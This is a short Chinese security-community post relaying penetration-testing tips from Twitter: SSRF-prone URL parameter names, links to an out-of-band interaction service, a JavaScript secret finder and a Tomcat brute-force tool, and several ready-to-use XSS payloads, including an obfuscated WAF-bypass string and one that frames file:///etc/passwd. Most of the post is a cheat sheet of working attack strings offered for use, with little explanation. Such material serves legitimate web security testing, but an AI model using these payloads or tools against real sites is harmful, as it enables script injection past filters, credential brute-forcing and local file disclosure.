Twitter渗透技巧搬运工 - 网安 - 专业的网络安全产业、社区、知识平台

Twitter渗透技巧搬运工

VSole2022-07-19 11:56:47

SSRF常用参数

?host=?redirect=?uri=?path=?continue=?url=?window=?next=?data=?image-source=?n=?to=?follow=?u=?go=?fetch=?source=?img-src=

XSS/XXE 等攻击的在线有效负载，以测试和检测带外交互

地址：https://github.com/projectdiscovery/interactsh

Tips Rxss

--><svg onload=alert(document.domain)>

shodan黑客语法

Pinkerton 是一款JavaScript 文件爬虫和密钥查找器

地址：https://github.com/oppsec/Pinkerton

tomcat爆破脚本工具

地址：https://github.com/oppsec/tomcter

XSS WafBypass

<svg><set onbegin=d=document,b='`',d['loca'+'tion']='javascript&colon;aler'+'t'+b+domain+b>
练习地址：https://brutelogic.com.br/gym.php?p05=%3Csvg%3E%3Cset+onbegin=d=document,b=%27%60%27,d[%27loca%27%2B%27tion%27]=%27javascript%26colon;aler%27%2B%27t%27%2Bb%2Bdomain%2Bb%3E
从XSS到本地文件读取<img src="xasdasdasd" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>

撤稿纠错

本作品采用《CC 协议》，转载必须注明作者和本文链接